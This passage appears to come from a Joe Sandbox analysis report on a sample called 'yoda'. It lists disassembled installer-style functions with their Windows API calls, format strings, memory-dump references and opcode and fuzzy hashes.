                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                • String ID: %TechnoBecome%$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                • API String ID: 1459762280-1480458765
                                                                                                                                                                                                                                                                • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00899408), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
